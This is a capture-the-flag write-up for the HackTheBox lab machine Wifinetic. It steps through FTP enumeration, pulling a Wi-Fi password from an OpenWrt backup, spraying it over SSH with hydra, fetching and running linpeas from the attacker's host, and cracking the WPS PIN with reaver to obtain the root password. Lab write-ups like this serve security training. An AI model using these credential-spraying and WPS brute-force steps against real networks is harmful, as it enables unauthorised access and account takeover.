HTB - Wifinetic
Wifinetic is an easy difficulty Linux machine which presents an intriguing network challenge, focusing on wireless security and network monitoring.
Last updated
Wifinetic is an easy difficulty Linux machine which presents an intriguing network challenge, focusing on wireless security and network monitoring.
Last updated
Scope
IP Address: 10.10.11.247
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp filtered smtp
53/tcp open domain
143/tcp filtered imap* Open ports: 21 - 22 - 53
* UDP Open ports:
* Services:
* Versions:
* Important Notes:FTP
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ tree -a 10.10.11.247
10.10.11.247
├── .listing
├── MigrateOpenWrt.txt
├── ProjectGreatMigration.pdf
├── ProjectOpenWRT.pdf
├── backup-OpenWrt-2023-07-26.tar
└── employees_wellness.pdfTalk a look at backup-OpenWrt-2023-07-26.tar . I could see that it's a backup for configuration files located at /etc
┌──(kali㉿kali)-[~/…/HTB/machines/Wifinetic/10.10.11.247]
└─$ tar -xvf backup-OpenWrt-2023-07-26.tar
./etc/
./etc/config/
./etc/config/system
./etc/config/wireless
./etc/config/firewall
./etc/config/network
./etc/config/uhttpd
./etc/config/dropbear
./etc/config/ucitrack
./etc/config/rpcd
./etc/config/dhcp
./etc/config/luci
./etc/uhttpd.key
./etc/uhttpd.crt
./etc/sysctl.conf
./etc/inittab
./etc/group
./etc/opkg/
./etc/opkg/keys/
./etc/opkg/keys/4d017e6f1ed5d616
./etc/hosts
./etc/passwd
./etc/shinit
./etc/rc.local
./etc/dropbear/
./etc/dropbear/dropbear_ed25519_host_key
./etc/dropbear/dropbear_rsa_host_key
./etc/shells
./etc/profile
./etc/nftables.d/
./etc/nftables.d/10-custom-filter-chains.nft
./etc/nftables.d/README
./etc/luci-uploads/
./etc/luci-uploads/.placeholder┌──(kali㉿kali)-[~/…/Wifinetic/10.10.11.247/etc/config]
└─$ cat wireless
<snip>
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
config wifi-iface 'wifinet1'
option device 'radio1'
option mode 'sta'
option network 'wwan'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'So, from the file above, We can information about two Access Points and their passwords
wifinet0: OpenWrt:VeRyUniUqWiFIPasswrd1!
wifinet1: OpenWrt:VeRyUniUqWiFIPasswrd1!┌──(kali㉿kali)-[~/…/machines/Wifinetic/10.10.11.247/etc]
└─$ cat passwd | cut -d: -f1 | tee -a users.list
root
daemon
ftp
network
nobody
ntp
dnsmasq
logd
ubus
netadmin
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ hydra -L users.list -p 'VeRyUniUqWiFIPasswrd1!' ssh://$ip
<snip>
[22][ssh] host: 10.10.11.247 login: netadmin password: VeRyUniUqWiFIPasswrd1!┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Wifinetic]
└─$ ssh netadmin@$ip
<snip>
System load: 0.07
Usage of /: 64.5% of 4.76GB
Memory usage: 6%
Swap usage: 0%
Processes: 226
Users logged in: 0
IPv4 address for eth0: 10.10.11.247
IPv6 address for eth0: dead:beef::250:56ff:fe94:12df
IPv4 address for wlan0: 192.168.1.1
IPv4 address for wlan1: 192.168.1.23
netadmin@wifinetic:~$netadmin@wifinetic:~$ cat user.txt
15b1159827f23a58a86df2f4ee876256User flag: 15b1159827f23a58a8xxxxxxxxxxxxxx
netadmin@wifinetic:~$ wget 10.10.16.25/linpeas.sh && chmod +x linpeas.sh
netadmin@wifinetic:~$ ./linpeas.sh | tee -a lin.ouput
<snip>
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/reaver = cap_net_raw+ep
<snip>All the above capabilities are standard ones except reaver, So I will search for this tool and see what exactly it does
WIFI Protected Setup (WPS) is a standard designed to make joining a Wi-Fi router easier, especially in home settings. The device would have an 8 digit pin printed on the device, and the user could enter that pin to join the network. reaver is a tool to brute force WPS PIN associated with any AP
netadmin@wifinetic:~$ reaver -h
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [10]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)
-F, --ignore-fcs Ignore frame checksum errors
-w, --win7 Mimic a Windows 7 registrar [False]
-K, --pixie-dust Run pixiedust attack
-Z Run pixiedust attack
Example:
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vvI run ifconfig to see available interfaces
netadmin@wifinetic:~$ ifconfig
<snip>
mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 37744 bytes 6689251 (6.6 MB)
RX errors 0 dropped 37744 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:0 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:00:00 txqueuelen 1000 (Ethernet)
RX packets 720 bytes 77584 (77.5 KB)
RX errors 0 dropped 179 overruns 0 frame 0
TX packets 937 bytes 120581 (120.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:100 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet)
RX packets 388 bytes 53737 (53.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 720 bytes 90544 (90.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan2: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0For the first moment, I could say that mon0 interface for monitoring mode and other wlanX are the interfaces for Access points on the machine.
The next step is to get more info about these APs
netadmin@wifinetic:~$ iwconfig
<sinp>
wlan0 IEEE 802.11 Mode:Master Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan1 IEEE 802.11 ESSID:"OpenWrt"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:00:00
Bit Rate:2 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:2 Missed beacon:0We can conclude that mon0 is the interface that we will use for attacking the access points and wlan1 is the target access point as it's the only one that have ESSID: "OpenWrt" with SSID:02:00:00:00:00:00
I can now start reaver to brute force WPS PIN
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtxxxxxxxxxxx'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.As there is no path for me now to root, I will try to authenticate to root with the WPA PSK key obtained above:
netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin#Success :)
root@wifinetic:~# cat root.txt
1114dd5c6d353295d878xxxxxxxxxxxxxxRoot flag: 1114dd5c6d353295d8xxxxxxxxxxxxx
